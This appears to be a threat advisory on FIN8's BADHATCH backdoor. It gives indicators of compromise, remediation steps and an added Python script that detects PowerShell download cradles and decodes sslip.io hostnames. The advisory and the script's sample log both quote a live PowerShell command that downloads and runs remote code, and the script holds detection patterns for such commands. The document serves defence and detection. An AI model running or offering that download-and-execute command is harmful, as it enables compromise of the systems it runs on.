March 16, 2021
Severity
High
Analysis Summary
FIN8 made its debut in 2016 and is known to take long breaks to improve its TTPs. The group has used a diverse array of techniques, from spear-phishing to zero-day exploits in Windows, to infect retail, hospitality and entertainment companies and steal payment card data from POS systems. The BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques. The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal PowerShell commands.
ATTACK ANALYSIS
Observed command line: "powershell.exe -nop $pa='sys';iex (New-Object System.Net.WebClient).DownloadString('https://192-129-189-73[.]sslip[.]io/yo')". It abuses sslip.io, a service that provides free IP-to-domain mapping to make SSL certificate generation easier (for traffic encryption). While the service is legitimate and widely used, the malware abuses it in an attempt to evade detection.
Impact
- Financial loss
- Theft of credit card information
- Exposure of sensitive data
Indicators of Compromise
IP
- 198[.]46[.]140[.]52
- 192[.]129[.]189[.]73
MD5
- f12f70c4756826105d693af27bb10627
- e73c4185f9712671c683f28fbddd1cca
- bf7fcef0f51a7fe6d00752b8cdf25762
- 5b638fde02fb7bf18ff68e9d99bd8de0
- 39145f3e1ac2d74d19cb4137ee3db000
SHA-256
- dbb3a665f9460343eb7625f8625815179e63aaa83f91b9283a296142ec4b2bbb
- c328b3714df8400f4d4c071edb1f6d3b82d42488ebf8d9437c300bec9108755b
- 981ecfc67d7192f0e82f3f8042d7c26c78396a3a62e5e34c717db31aee566eca
- 428cf5d05d9c3d4f7601ff785a175c1d86a90fe060a1f33976b363e8f9530a88
- 355d200eebf9d9102d5f2ba0c8a576948aef43640ae8f0eedf101e0e881be0b0
SHA1
- 79e5ac6f2a517ab7fa0e2bd0103ea0c14958e8e9
- 75fc0ce25767c0366b9c330de99f077620bb7c37
- 5d97e581853be9a8ca94a3b09d9f75f4ce99ef56
- 6c21e2aef9f3441786920acc6aa7bfddb240b2a6
- f229183304a5a1308b844a06b2b618cdd5518111
URL
- https[:]//192-129-189-73[.]sslip[.]io/yo
- https[:]//192-129-189-73[.]sslip[.]io/80
- https[:]//198-46-140-52[.]sslip[.]io/xxx
Remediation
- Separate the POS network from the ones used by employees or guests.
- Block all threat indicators at your respective controls.
- Search for IOCs in your environment.
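The following script is an added example for the attack analysis and the "Search for IOCs in your environment" step above; it is not part of the original alert and is not Rewterz's or the malware author's code. It refangs the indicators listed in this alert, flags PowerShell download cradles and stealth flags in process-creation command lines, decodes sslip.io hostnames back to the embedded IP so that the IoC IPs are still matched when only the hostname appears, and checks observed file hashes against the listed MD5/SHA1/SHA-256 values. The log lines in SAMPLE_LOG are constructed for the example; their format is an assumption, not a real event source.

```python
import re

# Indicators copied from the alert above, refanged for matching.
IOC_IPS = {"198.46.140.52", "192.129.189.73"}
IOC_HASHES = {
    # MD5
    "f12f70c4756826105d693af27bb10627", "e73c4185f9712671c683f28fbddd1cca",
    "bf7fcef0f51a7fe6d00752b8cdf25762", "5b638fde02fb7bf18ff68e9d99bd8de0",
    "39145f3e1ac2d74d19cb4137ee3db000",
    # SHA1
    "79e5ac6f2a517ab7fa0e2bd0103ea0c14958e8e9", "75fc0ce25767c0366b9c330de99f077620bb7c37",
    "5d97e581853be9a8ca94a3b09d9f75f4ce99ef56", "6c21e2aef9f3441786920acc6aa7bfddb240b2a6",
    "f229183304a5a1308b844a06b2b618cdd5518111",
    # SHA-256
    "dbb3a665f9460343eb7625f8625815179e63aaa83f91b9283a296142ec4b2bbb",
    "c328b3714df8400f4d4c071edb1f6d3b82d42488ebf8d9437c300bec9108755b",
    "981ecfc67d7192f0e82f3f8042d7c26c78396a3a62e5e34c717db31aee566eca",
    "428cf5d05d9c3d4f7601ff785a175c1d86a90fe060a1f33976b363e8f9530a88",
    "355d200eebf9d9102d5f2ba0c8a576948aef43640ae8f0eedf101e0e881be0b0",
}

# sslip.io maps names like 192-129-189-73.sslip.io to the IP written in the label.
SSLIP_RE = re.compile(r"\b(\d{1,3}(?:-\d{1,3}){3})\.sslip\.io\b", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Download-cradle building blocks seen in the command line quoted in the alert.
CRADLE_RE = re.compile(r"Net\.WebClient|DownloadString|\biex\b|Invoke-Expression", re.IGNORECASE)
# Flags commonly used to run PowerShell quietly (-nop appears in the alert's command line).
STEALTH_RE = re.compile(r"-nop\b|-NoProfile|-w(?:indowStyle)?\s+hidden|-enc\b|-EncodedCommand",
                        re.IGNORECASE)


def sslip_ips(text):
    """Return the IPs embedded in any sslip.io hostnames found in text."""
    return {m.group(1).replace("-", ".") for m in SSLIP_RE.finditer(text)}


def classify_command_line(cmd):
    """Return an ordered list of reasons a command line is suspicious (empty if none)."""
    reasons = []

    def add(reason):
        if reason not in reasons:
            reasons.append(reason)

    if CRADLE_RE.search(cmd):
        add("powershell download cradle")
    if STEALTH_RE.search(cmd):
        add("stealth powershell flags")
    for ip in sorted(sslip_ips(cmd)):
        add(f"sslip.io host resolving to {ip}")
        if ip in IOC_IPS:
            add(f"IoC IP {ip}")
    for ip in IPV4_RE.findall(cmd):
        if ip in IOC_IPS:
            add(f"IoC IP {ip}")
    return reasons


def scan_log(lines):
    """Return (line_index, reasons) for every log line that triggers at least one reason."""
    hits = []
    for i, line in enumerate(lines):
        reasons = classify_command_line(line)
        if reasons:
            hits.append((i, reasons))
    return hits


def match_hashes(observed):
    """Return the subset of observed hashes (any case) that appear in the alert's IoC list."""
    return {h.lower() for h in observed} & IOC_HASHES


# Constructed sample lines (hypothetical format: timestamp host event-id detail).
SAMPLE_LOG = [
    "2021-03-16 09:58:01 PC-01 4688 powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    "2021-03-16 10:02:17 PC-02 4688 powershell.exe -nop $pa='sys';iex (New-Object System.Net.WebClient)"
    ".DownloadString('https://192-129-189-73.sslip.io/yo')",
    "2021-03-16 10:03:44 PC-03 4688 cmd.exe /c echo hello",
    "2021-03-16 10:05:09 PC-04 5156 outbound 198.46.140.52:443 from powershell.exe",
]

if __name__ == "__main__":
    for idx, why in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {', '.join(why)}")
    print("hash hits:", match_hashes(["F12F70C4756826105D693AF27BB10627", "deadbeef"]))
```

Only the second and fourth constructed lines are reported: the first uses PowerShell legitimately and has no cradle, stealth flag or listed IP. Decoding the sslip.io label is what lets the listed IP match even when proxy or DNS logs only record the hostname; a rule that matches any sslip.io name would also fire on legitimate use of the service, so the script reports the decoded IP as context rather than treating the domain alone as an indicator.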